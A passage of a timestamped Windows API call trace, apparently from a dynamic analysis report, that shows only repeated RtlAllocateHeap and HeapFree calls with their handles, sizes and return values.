Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.006] RtlAllocateHeap (HeapHandle=0x6a0000, 